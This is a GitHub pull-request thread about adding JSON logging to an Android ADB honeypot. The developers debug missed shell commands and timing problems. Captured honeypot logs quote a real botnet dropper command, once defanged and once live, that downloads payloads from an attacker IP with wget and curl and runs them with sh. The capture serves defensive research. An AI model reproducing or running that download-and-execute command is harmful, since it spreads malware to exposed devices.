Implemented JSON logging and other improvements #22
Conversation
|
Please make sure you test it extensively before merging. I have tested it, of course (connection, shell command, file upload, disconnection) and it works - but since I've started running it, I am getting very few attacks and they all basically do nothing but abort with an error. Could be a fluke, of course, but I might have messed something up... |
|
Gonna test it tonight against my baseline logs. I'll notify you tomorrow on how it went. |
|
Gonna wait a bit with the merge. I haven't received any payloads like this "cd /data/local/tmp;wget hxxp://89.46.79.57/br -O- >br;sh br;busybox wget hxxp://89.46.79.57/r -O- >r;sh r;curl hxxp://89.46.79.57/c >c;sh c;busybox curl hxxp://89.46.79.57/bc >bc;sh bc" ever since I deployed the new version. I'll get back tonight with more details. |
|
89.46.79.57 had been taken down after I reported that host. It was the host I found running the honeypot for about 24 hours. If I remember correctly I only found 1 or to other hosts during that 24 hours, with no more than 1 connection attempt per host. I will run the (new) version over the weekend and see what it gets. Since it hasn't been that busy on the honeypot earlier I do not expect to find many hosts, so not finding much doesn't have to be a glitch in the software per se. Btw, great work being done here! Keep it up! |
|
89.46.79.57 might be down, but the infected machines running bots that try to download from it aren't. I've had a single hit from such a bot on 28th. Here's the JSON log: However, it worries me that I get very few hits in general. For instance, for the whole of November 29, the log contains only connections and disconnections; no infection attempts: It worries me that I might have screwed something up in the honeypot... |
|
OK, I see a possible problem here... So far I've been testing the script (after making modifications to it) by issuing And, to my surprise, with the original honeypot (branch master) this works but with my modifications (logging to a JSON file turned on), it produces various errors, like However, if I add a Could it be that, for some reason, the main code of the honeypot is very timing-sensitive? And if it spends additional time to write to logs, it somehow misses the next command or part of it? And, if this is the reason for the problem, any ideas how to fix it? Eventually I'd like to add more logging modules (e.g., to a MySQL database) and the logging will become even slower... |
|
Hi,
I am sorry, you are right. I shouldn't post anything with a high fever. My bad.
My honeypot is running again since yesterday evening but didn't catch any hits yet. I'll try to sort out if this is a problem on my end, or with the code from yesterday evening. I still have the original code in a vm, I could start that one for a comparison tomorrow.
… On 30 nov. 2018, at 00:16, Vesselin Bontchev ***@***.***> wrote:
89.46.79.57 might be down, but the infected machines running bots that try to download from it aren't. I've had a single hit from such a bot on 28th. Here's the JSON log:
{"eventid": "adbhoney.command.input", "src_ip": "115.193.74.152", "session": "8a543a2d2687", "input": "cd /data/local/tmp;wget http://89.46.79.57/br -O- >br;sh br;busybox wget http://89.46.79.57/r -O- >r;sh r;curl http://89.46.79.57/c >c;sh c;busybox curl http://89.46.79.57/bc >bc;sh bc", "unixtime": 1543358474, "timestamp": "2018-11-27T22:41:14.562003Z", "message": "shell:cd /data/local/tmp;wget http://89.46.79.57/br -O- >br;sh br;busybox wget http://89.46.79.57/r -O- >r;sh r;curl http://89.46.79.57/c >c;sh c;busybox curl http://89.46.79.57/bc >bc;sh bc", "sensor": "vess-box"}
However, it worries me that I get very few hits in general. For instance, for the whole of November 29, the log contains only connections and disconnections; no infection attempts:
2018-11-28T22:56:51.040146Z 193.238.46.24 connection start (6c385108e3c2)
2018-11-28T22:57:06.564265Z 193.238.46.24 error(104, 'Connection reset by peer') : '\x03\x00\x00+&\xe0\x00\x00\x00\x00\x00Cooki'
2018-11-28T22:57:06.564403Z 193.238.46.24 connection closed (6c385108e3c2)
2018-11-29T00:34:24.918145Z 81.7.14.210 connection start (4f0de3d4ed01)
2018-11-29T00:38:56.324215Z 81.7.14.210 connection closed (4f0de3d4ed01)
2018-11-29T01:33:55.431915Z 81.133.45.149 connection start (1eb6b39e7a94)
2018-11-29T01:40:18.208856Z 81.133.45.149 connection closed (1eb6b39e7a94)
2018-11-29T02:24:29.693559Z 74.82.47.5 connection start (15daa03dba2d)
2018-11-29T02:30:30.341065Z 74.82.47.5 connection closed (15daa03dba2d)
2018-11-29T02:39:47.180389Z 195.231.10.7 connection start (8687fcca15a7)
2018-11-29T02:45:47.571987Z 195.231.10.7 connection closed (8687fcca15a7)
2018-11-29T04:53:50.908919Z 217.175.215.173 connection start (42245dac1ee0)
2018-11-29T04:59:53.393884Z 217.175.215.173 connection closed (42245dac1ee0)
2018-11-29T14:14:54.382606Z 195.231.10.7 connection start (ea389266fcb8)
2018-11-29T14:20:54.774673Z 195.231.10.7 connection closed (ea389266fcb8)
2018-11-29T14:26:39.394649Z 185.156.177.12 connection start (ad0f87e80853)
2018-11-29T14:30:07.820394Z 185.156.177.12 error(104, 'Connection reset by peer') : '\x03\x00\x00/*\xe0\x00\x00\x00\x00\x00Cooki'
2018-11-29T14:30:07.820527Z 185.156.177.12 connection closed (ad0f87e80853)
2018-11-29T15:19:56.531718Z 185.156.177.12 connection start (b507408d1291)
2018-11-29T15:31:23.517734Z 185.156.177.12 error(104, 'Connection reset by peer') : '\x03\x00\x00/*\xe0\x00\x00\x00\x00\x00Cooki'
2018-11-29T15:31:23.517862Z 185.156.177.12 connection closed (b507408d1291)
2018-11-29T17:53:05.724996Z 176.110.224.221 connection start (77d1d5c5f778)
2018-11-29T17:58:46.976278Z 176.110.224.221 connection closed (77d1d5c5f778)
2018-11-29T18:09:22.611663Z 176.110.224.221 connection start (be4c24b72f39)
2018-11-29T18:09:55.567921Z 176.110.224.221 error(104, 'Connection reset by peer') : 'GET /status HTTP'
2018-11-29T18:09:55.568042Z 176.110.224.221 connection closed (be4c24b72f39)
2018-11-29T20:41:02.860782Z 93.76.176.62 connection start (75fb583f3e54)
2018-11-29T20:47:05.321603Z 93.76.176.62 connection closed (75fb583f3e54)
It worries me that I might have screwed something up in the honeypot...
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or mute the thread.
|
|
Got a few more hits today: And yes, the adb protocol is a bit time sensitive... I'll wait a bit more so we can completely sort this out before merging. |
|
If the protocol is time-sensitive, then my current approach to logging is totally wrong. Is there a way to fix this? Do the communication in an asynchronous way? Use Twisted, perhaps? It's a TCP/IP communication, after all... |
|
I'll get home and do a more through testing and review. I'll come back with more answers (hopefully) tomorrow evening. |
|
During our tests (with my current kind of JSON logging), the honeypot misses shell commands and file uploads if they arrive too fast. Perhaps implement these parts (dumping of file and logging the event, and the logging of the shell command) as threads? The logging of these events might be recorded physically out of order in the logs sometimes, but the timestamps will help ordering them correctly. |
|
Gonna merge it, as it provides way better improvements for now. I'll disable JSON logging for now, though. |
|
OK, folks, I've wasted way too much time trying to figure out what the problem in my code is - and, it turns out, it's not my code that has a problem. First, I tried to implement the processing of "slow" events (shell commands and file transfers - the ones that occasionally got missed) as threads. No can do - they are still missed occasionally. I was about to start re-doing the whole work from scratch, making minor changes and testing every time - when it occurred to me to test again the original code (what used to be in master, without my patch for JSON logging and other stuff). Well, surprise, surprise. The original code just missed a "shell" command when it arrived too fast. I am sorry, folks, but this honeypot does not work correctly. Until the problem is found and fixed, there is no point for me trying to improve it - it will be wasted effort. Problem is, I don't quite understand the protocol, I don't understand how the original code is supposed to work, so there is no hope of me fixing it. @huuck, it's up to you now. My colleague has implemented config file processing and output plug-ins (with my JSON logging implemented as a plug-in), but I've put these efforts on hold for now. The most urgent task is to get the original code working properly, because currently it doesn't. My colleague will try to implement the communication in Twisted. If she succeeds (which is not a given), we'll see if the result is a more robust implementation and, if this is the case, we'll start improving that. If not, I am giving up on this project. Bye for now; I'll be sure to report if we have any progress. |
|
Let's not jump to conclusions. I just finished conference season, so I had a few more time on this. It looks like this is a problem that comes from the adb command line and not from the server. Just tried this with two phones, and got the same problems. If you do an adb tcpip 5555 and use a script to send a bunch of shell commands, I keep getting device offline. Could you try that as well with a real phone? I only have 2 to test. If this is the case, JSON logging should be good to go. Kindest regards, |
|
I'll reactivate it right now as I've noticed that everything is working
without any issues after further testing.
…On Wed, Dec 5, 2018 at 1:44 PM Marco Ochse ***@***.***> wrote:
@bontchev <https://github.com/bontchev> Thanks for implementing JSON!
@huuck <https://github.com/huuck> I just re-activated JSON logging for my
installation and noticed that logging to file does not work.
Can you guys verify?
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
<#22 (comment)>, or mute
the thread
<https://github.com/notifications/unsubscribe-auth/ADMqxeIo0EDgKEGVWI1ybQGM9rxP3g_Qks5u17GxgaJpZM4Y16Lf>
.
|
|
@huuck Thanks, I did that for my installation already, however, logging to file does not seem to work for me. Can you verify for your installation or confirm? |
|
Nevermind, missed the |
|
@huuck, I cannot test with a real phone - I don't have a smart phone and wouldn't put it on the Internet even if I had one, not even for testing purposes. We did some additional testing and it seems that commands are missed more often when JSON logging is enabled. This could be just a fluke, of course, but if it is true, it means that things will slow down even more if we implement MySQL logging - and without MySQL logging, the honeypot is useless to us. My colleague tried to implement the honeypot in Twisted, but she has hit a snag there, too. She receives shell commands but not files. She's working with this reverse-engineered "specification" of the ADB protocol: https://github.com/cstyan/adbDocumentation#adb-push Her problem is that she reaches step 12 and then never receives an OKAY from the client, so she can't continue. Does this specification look correct to you? For instance, there is nothing there about sending replies twice. Anyway, I am giving up on this. I don't really care where the problem is - if it is in the adb client, instead of in the honeypot code, that's even worse, because it means we can't fix it. And, as I said, without the ability of logging the data to a MySQL database, the honeypot is useless to me. |
|
The best approach would be to have the logging on a separate thread. The
protocol is really time sensitive, so I'll try to have an interthreading
communication system in place and do logging separately.
…On Wed, Dec 5, 2018 at 3:56 PM Vesselin Bontchev ***@***.***> wrote:
@huuck <https://github.com/huuck>, I cannot test with a real phone - I
don't have a smart phone and wouldn't put it on the Internet even if I had
one, not even for testing purposes.
We did some additional testing and it seems that commands are missed more
often when JSON logging is enabled. This could be just a fluke, of course,
but if it is true, it means that things will slow down even more if we
implement MySQL logging - and without MySQL logging, the honeypot is
useless to us.
My colleague tried to implement the honeypot in Twisted, but she has hit a
snag there, too. She receives shell commands but not files. She's working
with this reverse-engineered "specification" of the ADB protocol:
https://github.com/cstyan/adbDocumentation#adb-push
Her problem is that she reaches step 12 and then never receives an OKAY
from the client, so she can't continue. Does this specification look
correct to you? For instance, there is nothing there about sending replies
twice.
Anyway, I am giving up on this. I don't really care where the problem is -
if it is in the adb client, instead of in the honeypot code, that's even
worse, because it means we can't fix it. And, as I said, without the
ability of logging the data to a MySQL database, the honeypot is useless to
me.
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
<#22 (comment)>, or mute
the thread
<https://github.com/notifications/unsubscribe-auth/ADMqxQHAae9ZC-Jy7snodqFqK_xveOqIks5u19CRgaJpZM4Y16Lf>
.
|
|
In the meantime I am preparing it for T-Pot |
|
@huuck, I already tried threading (at least for shell commands and for file transfer). It's a pretty easy change. But it doesn't help - it still misses stuff. |
|
OK, threaded logging of shell commands and file transfers - pull request #23. I am not really suggesting that you merge it; just play with it to see that it doesn't help, stuff is still missed if it is send very fast with adb. |
-h, --help-v, --version-l, --logfile LOGFILE-j, --jsonlog JSONLOG-s, --sensor SENSOR--debug-aand-p) to the command-line options--addressand--port.seq_number.printis now Python 3.x-ready.